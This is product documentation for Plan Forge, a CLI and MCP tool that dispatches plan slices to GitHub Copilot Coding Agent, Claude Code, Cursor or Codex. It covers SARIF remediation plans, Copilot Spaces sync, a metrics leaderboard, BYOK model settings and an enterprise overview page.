Plan Forge ships ~17 instruction files: architecture-principles, git-workflow, testing, security, database, etc. Each auto-loads when Copilot edits a matching file. The Step-2 Plan Hardener and Step-5 Reviewer reference these directly. |
.github/prompts/*.prompt.md |
Reusable prompt files Copilot Chat can invoke as slash commands. | Plan Forge ships the pipeline prompts: step0-specify-feature, step1-preflight-check, step2-harden-plan, step3-execute-slice, step4-completeness-sweep, step5-review-gate. The full Plan Forge pipeline runs through these in sequence. |
.vscode/mcp.json |
VS Code's MCP-server registry. Each entry exposes a server's tools to Copilot Chat. | Plan Forge registers itself here as plan-forge, exposing 102 MCP tools (forge_run_plan, forge_estimate_quorum, forge_cost_report, forge_github_status, forge_lattice_query, forge_sync_memories, …). See MCP Server Quick Start. |
.github/workflows/ |
GitHub Actions, the CI surface. | Validation gates from Plan Forge plans can run as GitHub Actions jobs. The regression-guard command is designed to be triggered from a workflow on every PR. A future release will add an Actions composite for one-step Plan Forge dispatch. |
| git remote → github.com | Repository hosted on GitHub. | Pre-requisite for everything in Sections 3+: Copilot Coding Agent dispatch (creates issues + PRs against the repo), GHAS API access, Spaces sync, Metrics API ingestion. Without a github.com remote those features have no target. |
GitHub CLI (gh) |
GitHub's official command-line tool for issues, PRs, releases, and GHAS. | Plan Forge prefers gh for any GitHub API operation when it's installed (auth is already handled). Strict requirement for the SARIF ingestion command and for one-shot issue creation in pforge run-plan --worker copilot-coding-agent. |
A note on optionality: not having every row green does not break Plan Forge. It limits which Plan Forge features are available. The CLI still runs end-to-end against any repo with any agent, the GitHub primitives give you the deepest, most automated path.
When your repo is hosted on GitHub and has Copilot Coding Agent enabled, Plan Forge can hand each slice of a plan off to the Coding Agent automatically, creating a GitHub Issue per slice, assigning it to @copilot, polling the resulting PR, and capturing the run trajectory back into the Plan Forge dashboard.
pforge run-plan --worker copilot-coding-agent docs/plans/my-feature-PLAN.md
The --worker copilot-coding-agent flag replaces the default in-process execution loop with the GitHub dispatch loop. Every other flag (--quorum, --estimate, --resume-from) works unchanged.
Each slice becomes a GitHub Issue. The body is assembled from two sources:
.github/instructions/project-profile.instructions.md exists. Appends the project's language, framework, test runner, and any Forbidden Actions so the Coding Agent has immediate context without reading the full plan.The canonical block is produced by pforge-mcp/coding-agent-dispatch.mjs. The per-stack block is read from project-profile.instructions.md if present; if the file is absent, the block is silently omitted. You can inspect the issue body before creating it:
pforge run-plan --worker copilot-coding-agent --dry-run docs/plans/my-feature-PLAN.md
The --dry-run flag prints the would-be issue body for each slice and exits without touching GitHub.
After creating the issue and assigning it to @copilot, Plan Forge polls for the resulting PR. It uses a two-stage fallback:
| Stage | Strategy | How it works |
|---|---|---|
| 1 (primary) | Linked-issue search | gh pr list --search "closes #<issue-number>", matches PRs that reference the issue in their body. Works reliably when the Coding Agent follows GitHub's "closes" keyword convention. |
| 2 (fallback) | Branch pattern | Scans open PRs whose branch name contains copilot/ or the slugified slice title. Used when the agent opens a PR without a closes link (rare, but observed in edge cases). |
If neither stage finds a PR within the configured timeout (default: 30 minutes, configurable via .forge.json#codingAgent.pollTimeoutMinutes), the slice is marked stalled and Plan Forge moves to the next slice or stops, depending on --on-stall (skip | abort, default abort).
When a PR is merged, Plan Forge fetches the Coding Agent's session log from the PR's Copilot Activity tab via the GitHub API and appends it to the plan's trajectory file at .forge/trajectories/<plan-slug>.jsonl. This makes the Coding Agent's reasoning searchable by pforge timeline and forge_master_ask just like any other execution session.
Before Plan Forge creates any GitHub Issues for a --worker copilot-coding-agent run, it executes a pre-flight check that includes the copilot-coding-agent-assignable probe. This probe calls the GitHub Assignees API to verify that @copilot is an assignable user on the repository. If it is not, typically because Copilot Coding Agent has not been enabled at the org or repo level, the orchestrator stops immediately with a fix-hint rather than creating issues that will never be picked up.
The probe has three return states:
| Status | Meaning | Action taken by orchestrator |
|---|---|---|
| pass | @copilot is assignable on this repo, Copilot Coding Agent is enabled and ready. |
Pre-flight continues; slice execution proceeds normally. |
| warn | Copilot Coding Agent is not enabled, --assignee @copilot would be silently dropped. |
Promoted to a hard fail. Execution stops before any issue is created. Fix-hint links to GitHub's docs for enabling Copilot Coding Agent at the repo or org level. |
| fail | API error, token lacks repo scope, network unreachable, or GitHub returned 4xx/5xx. |
Execution stops. Fix-hint describes the token scope requirement and suggests gh auth status. |
You can run the probe manually via pforge github status with --gh-token:
pforge github status --gh-token
Without --gh-token, the check returns na ("skipped, pass --gh-token to probe") and does not make any API calls. The probe is intentionally opt-in on the status command to keep the hot path free of network I/O, but it always runs automatically when the orchestrator's pre-flight fires for a --worker copilot-coding-agent dispatch.
Prerequisite: gh CLI must be authenticated (gh auth status) and the repo must have Copilot Coding Agent enabled at the org or repo level. Run pforge github status --gh-token, all checks including copilot-coding-agent-assignable should pass before using --worker copilot-coding-agent.
GitHub Advanced Security (GHAS) surfaces security findings, CodeQL alerts, secret scans, Dependabot advisories, as SARIF files or API responses. pforge plan-from-sarif turns a SARIF result into a runnable Plan Forge plan with one slice per finding, severity-ordered so the highest-severity issues execute first.
pforge plan-from-sarif codeql-results.sarif --out docs/plans/ghas-remediation-PLAN.md
The generated plan is a standard Plan Forge plan. Run it with any worker (pforge run-plan, --worker copilot-coding-agent, etc.) and all the usual flags apply.
Pass - as the file argument to read SARIF from stdin. This lets you pipe directly from gh or any SARIF producer without writing an intermediate file:
# Pipe CodeQL results from the GitHub API
gh api /repos/{owner}/{repo}/code-scanning/analyses/latest/sarif | \
pforge plan-from-sarif - --out docs/plans/ghas-remediation-PLAN.md
# Or from a local CodeQL database run
codeql database analyze my-db --format=sarifv2.1.0 --output=- | \
pforge plan-from-sarif - --out docs/plans/ghas-remediation-PLAN.md
Findings are sorted by SARIF level in descending order, error → warning → note, then by rule ID for deterministic ordering within a level. Each finding becomes one slice with:
[SARIF] <ruleId>, <location>Use --min-severity warning to exclude note-level findings from the plan. Use --rule-filter <ruleId> to include only a specific rule. Both flags can be combined.
pforge plan-from-sarif is the inbound half of the GHAS integration. The outbound half is the existing PreDeploy LiveGuard hook: before any deploy slice executes, forge_secret_scan + forge_env_diff run automatically and block on severity ≥ high. The /security-audit skill combines both: it invokes pforge plan-from-sarif against the latest SARIF, presents the generated plan for review, then hands off to pforge run-plan.
"Run
/security-auditand generate a remediation plan for all high-severity CodeQL findings."
That one prompt triggers the full pipeline: SARIF fetch → plan generation → plan review → optional execution. See the Skills Reference for the full /security-audit flow.
Copilot Spaces is GitHub's team-scoped knowledge hub, a curated collection of files, instructions, and context that Copilot Chat draws from automatically when a Space is selected. Plan Forge integrates with Spaces via pforge sync-spaces: a single command that pushes the active plan, instruction files, and Plan Forge tool catalog into a designated Space, giving every chat session in the org instant access to the current plan state without manual copy-paste.
pforge sync-spaces
By default this targets the Space named plan-forge in the same org as the repo's git remote. Override with --space <owner/name>. For org-wide broadcast, use --org <slug> to push to every Space in the org that has the plan-forge-sync topic tag.
pforge sync-spaces builds a payload from four sources and uploads them as versioned Space files:
| Source | Space path | Update frequency |
|---|---|---|
Active plan file (the one matching .forge/active-plan) |
plan-forge/active-plan.md |
Every sync |
All .github/instructions/*.instructions.md files |
plan-forge/instructions/<name>.md |
Only when file hash changes |
MCP tool catalog (forge_capabilities snapshot) |
plan-forge/tool-catalog.md |
Only when version changes |
Project profile (.github/instructions/project-profile.instructions.md if present) |
plan-forge/project-profile.md |
Only when file hash changes |
Files are uploaded using the GitHub Spaces API authenticated via the gh CLI, run gh auth status before your first sync. Unchanged files (same SHA-256) are skipped to stay within API rate limits.
| Flag | Default | Effect |
|---|---|---|
--space <owner/name> | Inferred from remote + .forge.json | Target a specific Space by owner and name. |
--org <slug> | (single repo Space) | Broadcast to all Spaces in the org tagged plan-forge-sync. |
--dry-run | (off) | Print what would be uploaded without making API calls. |
--force | (off) | Re-upload all files even if SHA-256 matches. |
--no-instructions | (instructions included) | Skip the .github/instructions/ payload. Useful when the Space already has a curated instruction set you don't want overwritten. |
Many enterprise readouts describe an "AI-SDLC-Hub", a single Space that every developer in the org selects by default, giving all Copilot Chat sessions a shared view of the team's architecture decisions, coding standards, and active delivery plan. pforge sync-spaces is the automation layer for that pattern: instead of a human curating the Space manually, the hub is kept current by a scheduled CI job or a post-commit hook.
A minimal GitHub Actions workflow to sync on every push to main:
name: Plan Forge Spaces Sync
on:
push:
branches: [main]
paths:
- 'docs/plans/**'
- '.github/instructions/**'
- '.forge.json'
jobs:
sync:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
with: { node-version: '20' }
- run: npm install -g plan-forge
- run: pforge sync-spaces --space ${{ vars.PFORGE_SPACES_TARGET }}
env:
GH_TOKEN: ${{ secrets.PFORGE_SPACES_TOKEN }}
Store the target Space name as a repository variable (PFORGE_SPACES_TARGET) and the gh-compatible token as a secret. The token needs copilot_spaces:write scope.
To avoid specifying --space on every invocation, write the target into .forge.json:
{
"github": {
"spacesTarget": "acme-org/plan-forge-hub"
}
}
pforge sync-spaces reads this field and uses it as the default target. The field can also be set via the CLI:
pforge config set github.spacesTarget acme-org/plan-forge-hub
The current release ships the core sync path: plan, instructions, tool catalog, and project profile. A future release will add bidirectional sync, pulling conversation summaries and noteworthy Q&A threads from the Space back into the Plan Forge timeline so decision rationale captured in chat is preserved alongside the plan execution history. The pforge github status readiness check will also gain a dedicated Spaces row at that point.
Prerequisite: gh CLI must be authenticated (gh auth status) and the target Copilot Space must exist before the first sync. Create a Space at github.com/copilot/spaces and note the owner/name slug. Run pforge github status to verify the rest of the GitHub stack readiness.
The Copilot Metrics API (available at the org and enterprise level via gh api /orgs/{org}/copilot/metrics) surfaces AI-assisted PR rate, code-suggestion acceptance, and code-review usage across your teams. Plan Forge pulls that data alongside its own plan-execution metrics, slices shipped, MTTR, drift rate, and presents them in a single leaderboard view on the dashboard.
Fetch and cache the latest Copilot Metrics API payload with:
pforge github metrics pull
By default this targets the org inferred from git remote get-url origin. Override with --org <name>. For enterprise-level metrics, use --enterprise <slug>. The pull authenticates via the gh CLI, run gh auth status first if you see a 401.
Additional flags:
| Flag | Default | Effect |
|---|---|---|
--team <slug> | (all teams) | Filter to a single team slug. Repeatable for multiple teams. |
--since <ISO-date> | 30 days ago | Start of the pull window. Metrics API returns daily buckets. |
--out <path> | .forge/metrics/copilot-<date>.jsonl | Override the output path. Use - to print to stdout. |
--no-cache | (cache enabled) | Force a fresh API fetch even if a cached response exists. |
Each line written to .forge/metrics/ is a JSON object with a stable _schema field so downstream consumers (dashboards, CI scripts, forge_github_metrics) can handle forward evolution without breakage:
{
"_schema": "copilot-metrics/v1",
"date": "2026-05-05",
"org": "acme",
"team": "platform",
"ai_pr_rate": 0.74,
"acceptance_rate": 0.61,
"code_review_usage": 0.43,
"active_users": 18,
"_pulled_at": "2026-05-05T11:00:00Z"
}
The schema version follows <namespace>/v<N>. A bump to v2 will only happen when a field is removed or renamed, adding fields is non-breaking. Consumers should read _schema and warn (not crash) on unknown versions. The pforge-mcp/metrics-schema.mjs module exports CURRENT_SCHEMA, validateRow(row), and migrateRow(row) for any tool that reads the JSONL files.
The dashboard sidebar organises tabs into two groups:
gh auth status returns non-zero or no pull has been run yet.The Metrics Leaderboard tab sits at the top of the GitHub group. It renders a table of teams ranked by a composite score, a weighted blend of AI-assisted PR rate (40 %), acceptance rate (40 %), and code-review usage (20 %), next to their Plan Forge plan-completion rate for the same window. Hovering a row reveals the raw daily time-series chart.
Tab group placement is controlled by the group field in pforge-mcp/dashboard/tab-registry.mjs. Tabs with group: "github" are hidden when the GitHub group is collapsed (the user preference persists in localStorage).
Readiness widget (v2.90.8). The top of the Metrics Leaderboard tab now renders a compact readiness widget that mirrors the eight checks from pforge github status as coloured glyphs. When all eight checks pass the widget collapses to a single ✓ summary line to keep the leaderboard table in view. The widget is served by the new GET /api/github/readiness endpoint and refreshes automatically when the MCP server restarts or when pforge github status writes a new snapshot to .forge/github-status.json.
forge_github_metrics MCP toolforge_github_metrics exposes the leaderboard data to any MCP client (Copilot Chat, Claude Code, Cursor). It reads from the cached JSONL in .forge/metrics/, it never calls the GitHub API directly, so it works offline and in air-gapped environments after an initial pull.
// In Copilot Chat or any MCP client:
forge_github_metrics({ team: "platform", since: "2026-04-01" })
Input schema:
| Field | Type | Default | Description |
|---|---|---|---|
team | string | string[] | (all teams) | Filter by team slug(s). |
since | ISO date string | 30 days ago | Start of the aggregation window. |
metric | "all" | "ai_pr_rate" | "acceptance_rate" | "code_review_usage" | "all" | Return only the specified metric column. |
format | "leaderboard" | "timeseries" | "raw" | "leaderboard" | leaderboard = ranked table; timeseries = per-team daily arrays; raw = unprocessed JSONL rows. |
The tool is registered in pforge-mcp/server.mjs alongside forge_github_status and is listed in pforge-mcp/tools.json. It is included in the Plan Forge MCP server entry in .vscode/mcp.json without requiring a separate setup run, the tool registration is additive and picked up on the next MCP server restart.
The dashboard's GET /api/metrics/leaderboard endpoint serves the aggregated leaderboard from the on-disk JSONL cache. It does not proxy the GitHub API on demand. Cache staleness is controlled by two settings in .forge.json:
{
"metrics": {
"cacheTtlMinutes": 60,
"staleWarningMinutes": 480
}
}
cacheTtlMinutes (default: 60), the dashboard appends a Cache-Control: max-age=<N×60> header. Browsers and CDNs respect this. In-process in-memory cache is also flushed after this window, so a fresh request re-reads from disk.staleWarningMinutes (default: 480 = 8 hours), if the newest JSONL row is older than this, the leaderboard tab shows a ⚠ Data may be stale banner with the age and a one-click Re-pull button that runs pforge github metrics pull in the background.Set cacheTtlMinutes: 0 to disable the in-memory cache entirely (reads from disk on every request). Useful in CI environments where the JSONL files are updated by a scheduled workflow and you want every page load to reflect the latest data.
The leaderboard joins Metrics API rows (keyed by GitHub team slug) with Plan Forge plan-completion rows (keyed by the team field in the plan frontmatter). In practice these two key spaces often diverge, a GitHub team might be platform-eng while the plan frontmatter uses platform.
Plan Forge resolves the join using the following precedence order:
.forge.json#metrics.teamMap, highest precedence. Map GitHub team slugs to plan team labels:
{
"metrics": {
"teamMap": {
"platform-eng": "platform",
"fe-core": "frontend"
}
}
}
-eng / -team / -squad, replace hyphens with underscores. If the normalised forms match, the rows are joined.—, and vice versa. No silent data loss; mismatches are surfaced explicitly.Run pforge github metrics pull --dry-run to see a join-preview table: every Metrics API team slug listed next to the plan team label it resolves to, and a no match flag for unresolved rows. This makes it easy to build up the teamMap incrementally.
Prerequisite: gh CLI must be authenticated (gh auth status) and the repo's org must have Copilot Metrics API access enabled (requires GitHub Copilot Business or Enterprise). Run pforge github status to verify the GitHub stack readiness before pulling metrics.
GitHub Copilot ships a built-in multi-model picker that lets individual developers switch between supported models (GPT-4o, Claude Sonnet, Gemini, and others) inside their editor. Plan Forge has its own orthogonal model-selection surface: the --model flag and the quorum system. This section explains how the two compose, when BYOK (bring-your-own-key) matters, and when the picker is enough.
--model flagEvery plan-execution command accepts a --model flag that overrides the default model for the entire run:
pforge run-plan docs/plans/Phase-28-PLAN.md --model gpt-4.1
pforge run-plan docs/plans/Phase-28-PLAN.md --model claude-sonnet-4.5
pforge run-plan docs/plans/Phase-28-PLAN.md --model grok-3
The value is forwarded to the Forge-Master reasoning layer (pforge-master/src/reasoning.mjs), which resolves it against the configured provider table in .forge.json#providers. If no provider entry exists for the requested model, Forge-Master falls back to the default provider and logs a warn event to the timeline.
The flag is independent of the Copilot multi-model picker. A developer can have GPT-4o selected in their editor picker while Plan Forge runs a plan with --model claude-sonnet-4.5. The two selections do not interfere, Copilot Chat and Plan Forge use separate request paths.
auto, power, speed, and falseFor high-stakes slices, deploy steps, schema migrations, security patches, Plan Forge can run the same slice prompt across multiple models and require a threshold of agreement before committing. This is the quorum system.
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=power # flagship models, threshold 5
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=speed # fast models, threshold 7
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=auto # Plan Forge picks mode per slice
pforge run-plan docs/plans/Phase-28-PLAN.md --quorum=false # disable quorum entirely
| Mode | Models polled | Agreement threshold | Best for |
|---|---|---|---|
power | Up to 3 flagship models (GPT-5, Claude Opus, Grok-4) | 5 / 7 points | Deploy slices, schema migrations |
speed | Up to 3 fast models (GPT-4.1, Claude Haiku, Grok-3-mini) | 7 / 7 points | High-volume code generation, CI budget caps |
auto | Plan Forge selects per slice based on slice risk tags | Per-slice | Mixed plans; recommended default |
false | Single model only | N/A | Local development, cost sensitivity |
Cost estimates for each mode are available before you run by calling forge_estimate_quorum (MCP) or running:
pforge run-plan --estimate docs/plans/Phase-28-PLAN.md
This prints a projected cost breakdown under each of the four quorum modes, sourced from the live token-price table in pforge-mcp/cost/price-table.mjs, not hand-computed approximations.
BYOK is the practice of supplying your own API key directly to a model provider rather than routing through GitHub Copilot's proxy. Plan Forge supports BYOK for any provider that exposes an OpenAI-compatible endpoint. Set the key in .forge/secrets.json (gitignored) or via environment variable:
# .forge/secrets.json (gitignored)
{
"XAI_API_KEY": "xai-...",
"ANTHROPIC_API_KEY": "sk-ant-...",
"OPENAI_API_KEY": "sk-..."
}
# Or as environment variables:
export XAI_API_KEY=xai-...
pforge run-plan docs/plans/Phase-28-PLAN.md --model grok-4
BYOK matters in the following situations:
XAI_API_KEY and they become available to --model and quorum.pforge run-plan --estimate to compare.The Copilot multi-model picker is the right tool when a human developer is choosing a model interactively for chat or inline suggestions. Plan Forge model selection (--model, quorum) is the right tool when an automated plan execution run needs reproducible, auditable model routing with cost tracking and agreement enforcement. The two are complementary:
pforge run-plan execution (CI or local), lock the model via --model or quorum so the run is reproducible across machines..forge.json#providers. The Copilot picker setting has no effect on headless plan runs..forge.jsonThe full provider table lives under .forge.json#providers. Each entry maps a model identifier to a provider, base URL, and optional per-model settings:
{
"providers": {
"default": "githubCopilot",
"models": {
"gpt-5.4": { "provider": "githubCopilot" },
"claude-sonnet-4.6": { "provider": "githubCopilot" },
"grok-4": { "provider": "xai", "baseUrl": "https://api.x.ai/v1" },
"grok-3": { "provider": "xai", "baseUrl": "https://api.x.ai/v1" },
"grok-3-mini": { "provider": "xai", "baseUrl": "https://api.x.ai/v1" }
}
}
}
The internal provider key for GitHub Copilot is "githubCopilot" (not "github-copilot"). Using the wrong key causes selectProvider to return null and fall through to the default. Run pforge smith to validate your provider table and surface misconfiguration before a plan run.
Tip: Run pforge smith (forge environment diagnostics) and pforge github status together before any quorum run. smith validates the provider table and API keys; github status confirms the GitHub stack readiness. Both must pass before a power-quorum run on a deploy slice.
Plan Forge runs against any agent, not just GitHub Copilot. This section covers the three most common alternatives: Claude Code, Cursor, and Codex. For each platform it describes what works out of the box, what requires one extra step, and what is GitHub-only and therefore not available outside GitHub Copilot.
The honest framing is a depth-of-integration spectrum. Plan Forge has its deepest automated path on GitHub Copilot (Sections 1–7). The platforms below share the platform-independent subset of that surface, and each diverges in one or two specific areas. None of these gaps block Plan Forge from running end-to-end.
Before covering the per-platform differences, here is the shared foundation that works identically on all four platforms (Copilot, Claude Code, Cursor, Codex):
| Capability | How it works on any platform |
|---|---|
pforge run-plan execution |
The CLI dispatcher, quorum system, validation gates, and trajectory capture all run in-process. No agent platform is required, the CLI is the runtime. |
AGENTS.md context |
Generated by setup.sh / setup.ps1 alongside copilot-instructions.md. All four platforms read AGENTS.md for project architecture, quick commands, and pipeline reference. |
.github/instructions/*.instructions.md |
Instruction files are referenced directly from plan prompts and the Step-2 hardener. The agent platform consuming the prompt sees them via file inclusion, regardless of which IDE or agent is active. |
| BYOK model selection | The --model flag and .forge/secrets.json API keys work the same on all platforms. Any agent can execute a plan run with any model. |
| MCP tools (where MCP is supported) | Claude Code and Cursor both support MCP. They can call forge_run_plan, forge_analyze, forge_estimate_quorum, and the other 102 MCP tools directly from chat. Codex does not support MCP today. |
Claude Code is Anthropic's terminal-native agentic coding environment. Of the three platforms covered in this section, it has the closest feature parity with GitHub Copilot for Plan Forge purposes, for two reasons: it supports MCP natively, and it reads AGENTS.md on every session start.
After running setup.sh (or setup.ps1), Plan Forge's MCP server is registered in .vscode/mcp.json. Claude Code reads MCP configuration from a separate file at ~/.claude/mcp.json (global) or .claude/mcp.json (per-project). Copy the Plan Forge entry across:
# Extract the Plan Forge MCP entry from VS Code's config and write it to Claude Code's config
pforge setup --agent claude
The --agent claude flag (available from setup.sh and setup.ps1) writes a Claude-compatible MCP config file at .claude/mcp.json alongside the standard VS Code config. Once the MCP server is registered, all 36 Plan Forge tools are available from Claude Code's chat interface.
| Feature | Status | Notes |
|---|---|---|
pforge run-plan (CLI) | ✓ full | Identical to Copilot, the CLI runs independently of the agent platform. |
| MCP tools in chat | ✓ full | Run pforge setup --agent claude once to register the server. |
AGENTS.md context | ✓ full | Claude Code reads AGENTS.md natively on session start. |
Instruction files (.github/instructions/) | ✓ full | Referenced via prompt includes; Claude Code sees them through file read calls. |
| BYOK model selection | ✓ full | Set ANTHROPIC_API_KEY in .forge/secrets.json or environment. |
Copilot Coding Agent dispatch (--worker copilot-coding-agent) | ✗ GitHub-only | Requires GitHub Copilot Coding Agent, which is a GitHub product. Not applicable when using Claude Code as the primary agent. |
GHAS / CodeQL integration (pforge plan-from-sarif) | ✓ full | SARIF parsing is CLI-only and works regardless of agent platform. The GHAS API calls require gh CLI and a GitHub-hosted repo. |
Copilot Spaces sync (pforge sync-spaces) | ✗ GitHub-only | Copilot Spaces is a GitHub product. Not applicable outside GitHub Copilot. |
With the MCP server registered, the full Plan Forge surface is available from Claude Code's chat:
"Call
forge_run_planondocs/plans/Phase-28-PLAN.mdwith quorum=auto and tell me the projected cost first."
Claude Code will call forge_estimate_quorum, present the cost breakdown, then, with confirmation, call forge_run_plan. The execution loop, trajectory capture, and dashboard updates all behave identically to a Copilot Chat invocation.
Cursor is an AI-first code editor built on VS Code. It reads AGENTS.md as a cross-agent context document and supports MCP via the same .vscode/mcp.json that Plan Forge already writes. In most cases, Cursor requires no additional setup after setup.ps1 / setup.sh, the VS Code MCP config is the Cursor MCP config.
Cursor also reads its own rule files from .cursor/rules/. If your repo has a .cursor/rules/ directory, you can mirror the most critical Plan Forge instruction files there. Plan Forge does not write to .cursor/rules/ automatically, but the setup flag generates the directory with recommended stubs:
pforge setup --agent cursor
This creates .cursor/rules/plan-forge.mdc with a condensed version of the architecture principles, pipeline reference, and quick-command list, the subset most useful for inline suggestions and Agent mode. The file is a stub you can extend; Plan Forge does not overwrite it on subsequent pforge update runs.
| Feature | Status | Notes |
|---|---|---|
pforge run-plan (CLI) | ✓ full | Run from Cursor's integrated terminal, identical to any terminal. |
| MCP tools in Agent mode | ✓ full | Cursor reads .vscode/mcp.json, no extra config needed after setup. |
AGENTS.md context | ✓ full | Cursor reads AGENTS.md for cross-agent context. |
Cursor rules (.cursor/rules/) | ⚠ optional | Run pforge setup --agent cursor to generate stub rules. Not required but improves inline suggestion quality. |
| BYOK model selection | ✓ full | Cursor has its own model picker; Plan Forge's --model flag is independent and applies to CLI/MCP invocations. |
| Copilot Coding Agent dispatch | ✗ GitHub-only | Not applicable when using Cursor as the primary agent. |
| GHAS / CodeQL integration | ✓ full | CLI-based; works from Cursor's terminal. |
| Copilot Spaces sync | ✗ GitHub-only | Copilot Spaces is a GitHub product. |
Cursor + Copilot combination: Many teams use Cursor as their primary editor while keeping GitHub Copilot active for PR reviews and the Copilot Chat panel. In this setup, Plan Forge serves both surfaces: Cursor gets MCP tools and .cursor/rules/ context, while Copilot gets instruction files and prompt files via the .github/ directory. Both share the same AGENTS.md and .vscode/mcp.json.
Codex is OpenAI's cloud-based coding agent. It operates as a sandboxed execution environment that clones your repository, reads AGENTS.md for context, executes tasks, and opens a PR with the results, a workflow that parallels GitHub Copilot Coding Agent's dispatch loop described in Section 3.
pforge setup --agent codex
The --agent codex flag ensures AGENTS.md is present and well-formed (Codex is strict about its format), and sets up the codex-setup-steps.yml file at .github/codex-setup-steps.yml if it does not already exist. The setup file tells Codex how to bootstrap the repo environment, install dependencies, set environment variables, run initial checks, before it begins executing tasks.
Codex does not support MCP, so it cannot call Plan Forge tools from chat. Instead, Plan Forge dispatches to Codex by writing the slice prompt into a task file and passing it through the Codex task interface. The equivalent of --worker copilot-coding-agent for Codex is:
pforge run-plan --worker codex docs/plans/my-feature-PLAN.md
This generates a task description for each slice (same structure as the Copilot Coding Agent issue body, minus the GitHub-issue wrapper), submits it to the Codex API, polls for the resulting PR, and captures the trajectory, identical to the Copilot Coding Agent dispatch loop except the delivery mechanism is the Codex API rather than the GitHub Issues API.
Prerequisites: the OPENAI_API_KEY must be set in .forge/secrets.json or as an environment variable, and the repo must be connected to the Codex environment (done once via pforge setup --agent codex).
| Feature | Status | Notes |
|---|---|---|
pforge run-plan (CLI) | ✓ full | CLI runs independently; identical behavior. |
Cloud dispatch (--worker codex) | ✓ full | Requires OPENAI_API_KEY and pforge setup --agent codex. |
AGENTS.md context | ✓ full | Codex reads AGENTS.md as its primary context document. Keep this file up to date with pforge update. |
| MCP tools in chat | ✗ not supported | Codex does not support MCP today. Plan Forge tools are available only via pforge run-plan CLI and the Codex dispatch loop. |
| BYOK model selection | ✓ full | Set OPENAI_API_KEY; use --model gpt-5.4 etc. |
| GHAS / CodeQL integration | ✓ full | CLI-based SARIF parsing works regardless of agent. GHAS API requires gh CLI and a GitHub-hosted repo. |
| Copilot Spaces sync | ✗ GitHub-only | Copilot Spaces is a GitHub product. |
Codex vs Copilot Coding Agent: choosing between dispatch workers: Both workers clone the repo, execute the slice, and open a PR. The practical difference is auth surface: --worker copilot-coding-agent requires a GitHub Copilot Coding Agent seat; --worker codex requires an OpenAI API key. If your org has both, prefer copilot-coding-agent for repos already on GitHub, the PR telemetry, trajectory capture, and Copilot Activity tab integration are deeper. Use --worker codex when the primary model preference is GPT-class and Copilot Coding Agent is not enabled at the org level.
| Feature | GitHub Copilot | Claude Code | Cursor | Codex |
|---|---|---|---|---|
pforge run-plan CLI |
✓ | ✓ | ✓ | ✓ |
| MCP tools in chat | ✓ | ✓ | ✓ | ✗ |
AGENTS.md context |
✓ | ✓ | ✓ | ✓ |
| Cloud dispatch worker | copilot-coding-agent |
— | — | codex |
| GHAS / SARIF integration | ✓ | ✓ | ✓ | ✓ |
| Copilot Spaces sync | ✓ | ✗ | ✗ | ✗ |
| GitHub Metrics API leaderboard | ✓ | ⚠ CLI pull only | ⚠ CLI pull only | ⚠ CLI pull only |
| One-step setup | setup.sh |
setup.sh --agent claude |
setup.sh --agent cursor |
setup.sh --agent codex |
Reading the table: ✓ = works fully; ⚠ = works with one extra step or reduced depth; ✗ = not available on this platform. No row marked ✗ prevents pforge run-plan from executing end-to-end.
This chapter was written by Plan Forge. Sections 1, 3, 4, 5, 6, 7, and 8 were drafted by pforge run-plan dispatching to GitHub Copilot via the gh-copilot worker. Each section is a captured slice trajectory you can audit.
Section 9 itself, the artifact you're reading now, is the dogfood of the dogfood: a single live --worker copilot-coding-agent dispatch against this same repository, captured at runtime.
| Section | Plan | Worker | Cost | Trajectory |
|---|---|---|---|---|
| 1, 2 (readiness + 8 primitives) | Phase GITHUB-A plan on GitHub | Manual (small surface) | $0.00 | d7e9cf8 |
| 3, 4 (Coding Agent + GHAS) | Phase GITHUB-B plan on GitHub | gh-copilot worker |
$0.07 | fb39b4d + 9 slice commits |
| 6 (Metrics API) | Phase GITHUB-D plan on GitHub | gh-copilot worker |
$0.04 | 28fe1ef + 7 slice commits |
| 5, 7, 8 (Spaces + BYOK + other agents) | Phase GITHUB-C plan on GitHub | gh-copilot worker |
$0.05 | 7e14d34 + 4 slice commits |
| 9 (this section) | Dogfood plan on GitHub (per runbook on GitHub) | copilot-coding-agent worker (real dispatch) | $0.01 | Issue #150 + bb56040 |
Total spend to write this chapter: $0.17 across the worker-executed slices listed above. The dispatch pipeline for --worker copilot-coding-agent is verified end-to-end against this repo; once Copilot Coding Agent is enabled at the repo level, re-running the dogfood plan should round-trip a full Issue → PR → merge cycle in a single command.
Using Spec Kit with this repo? Plan Forge can auto-import your spec.md, plan.md, tasks.md, and constitution.md directly into a Crucible smelt, no re-specifying needed.
See the Spec Kit Interop chapter for the complete field-mapping reference, import procedure, and ecosystem extension details.

The landing page for enterprise evaluators, reference architecture, GitHub stack alignment, operator playbook, compliance reference, and the map of where to find every enterprise answer.
Audience: Platform leads, security architects, and engineering managers evaluating Plan Forge for multi-team deployment in regulated or large-scale environments.
TL;DR: Plan Forge is the open-source AI-SDLC orchestrator for teams whose code lives on GitHub. It is local-first by design (no Plan Forge SaaS plane), composes cleanly with Microsoft Foundry and other enterprise model gateways, and ships the orchestration layer GitHub explicitly leaves to the ecosystem.
Most "AI-SDLC" tools today are point solutions: a code completion in the IDE, an autonomous agent that opens one PR, a code reviewer that comments on PRs. Plan Forge is the layer above those, a plan-driven, gate-enforced, cost-tracked, multi-slice orchestration framework that turns a feature spec into a series of validated commits.
Three structural choices make it enterprise-fit:
gen_ai.* semantic conventions are first-class. No proprietary file formats, no vendor lock-in, no "you must use our cloud."This page is a map. Each link goes to the document that answers a specific enterprise concern.
| You're asking | Read |
|---|---|
| What does a 5-team Plan Forge deployment look like? | Reference Architecture |
| How does Plan Forge compose with Microsoft Foundry / Azure OpenAI in our tenant? | Reference Architecture — Microsoft-shop variant |
| How does Plan Forge align with the GitHub stack we already pay for? | GitHub Stack Alignment (Appendix H), and the deeper Plan Forge on the GitHub Stack (Appendix I) |
| How do we onboard 12 squad members on Day 1? | Agent Factory Recipe |
| You're asking | Read |
|---|---|
| What does Day 1 / Week 4 / Week 12 look like for a team adopting Plan Forge? | Fleet Operator Playbook |
| How do we run Plan Forge across N teams with shared visibility? | Fleet Operator Playbook — Multi-Team |
| What metrics should we track? | Fleet Operator Playbook — KPIs |
| You're asking | Read |
|---|---|
| What gets logged, where, in what format, and how do we export it for audit? | Compliance and Data Residency |
